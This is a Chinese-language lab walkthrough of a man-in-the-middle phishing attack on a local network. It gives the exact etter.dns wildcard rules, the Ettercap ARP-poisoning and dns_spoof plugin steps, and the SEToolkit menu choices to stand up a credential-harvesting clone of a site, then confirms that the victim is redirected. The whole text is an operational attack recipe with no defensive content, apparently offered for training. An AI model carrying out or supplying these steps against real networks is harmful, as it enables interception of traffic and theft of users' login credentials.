环境说明
主机 | IP 地址 | 角色 |
---|---|---|
攻击机(Kali) | 172.16.129.251 | 执行 DNS 劫持与钓鱼攻击 |
靶机 | 172.16.129.190 | 目标主机 |
网关 | 172.16.129.254 | 局域网网关 |
详细步骤
一、修改 Ettercap 的 DNS 配置文件(劫持核心)
-
打开 Ettercap 的 DNS 规则文件:
vim /etc/ettercap/etter.dns
-
添加全局劫持规则(将所有域名解析到攻击机 IP):
# 所有域名A记录指向攻击机 * A 172.16.129.251 # 反向解析同样指向攻击机(增强欺骗效果) * PTR 172.16.129.251
-
保存文件并关闭编辑器(确保无语法错误)。
二、启动 Ettercap 图形化工具并配置流量拦截
-
打开 Ettercap 图形界面:
ettercap -G
-
选择网络接口: 点击菜单栏
Sniff
→Unified sniffing
,选择攻击机的网卡(如eth0
),点击OK
。
-
扫描局域网主机: 按下
Ctrl+S
或点击工具栏放大镜图标,扫描完成后点击Hosts
→Host list
查看设备。
-
设置目标(网关和靶机):
-
在主机列表中找到网关(172.16.129.254),右键选择
Add to Target 1
。 -
找到靶机(172.16.129.190),右键选择
Add to Target 2
。
三、开启 ARP 欺骗(流量劫持基础)
-
点击菜单栏
Mitm
→ARP poisoning
,勾选Sniff remote connections
(允许嗅探远程连接),点击OK
。
-
此时攻击机已成为靶机与网关之间的 “中间人”,所有流量会经过攻击机。
四、加载 DNS 欺骗插件(激活域名劫持)
-
点击菜单栏
Plugins
→Manage plugins
,在插件列表中找到dns_spoof
,双击激活。
-
底部状态栏会显示 “dns_spoof activated”,表示 DNS 劫持已生效。
五、启动 SEToolkit(构建钓鱼场景)
-
打开新终端,启动社会工程学工具包(SEToolkit):
setoolkit
-
按以下步骤配置钓鱼页面(演示
baidu
):-
输入
1
选择Social-Engineering Attacks
(社会工程学攻击)。 -
输入
2
选择Website Attack Vectors
(网页攻击向量)。 -
输入
3
选择Credential Harvester Attack Method
(凭证收割攻击)。 -
输入
1
选择Web Templates
(使用预设网页模板),或输入2
自定义克隆目标网站。 -
当提示 “Enter the IP address to listen on” 时,输入攻击机 IP或回车:
172.16.129.251
。
-
攻击效果验证
在靶机(172.16.129.190)上操作:打开浏览器访问任意网站(如123.com
),会被 DNS 劫持强制跳转至攻击机构建的钓鱼页面。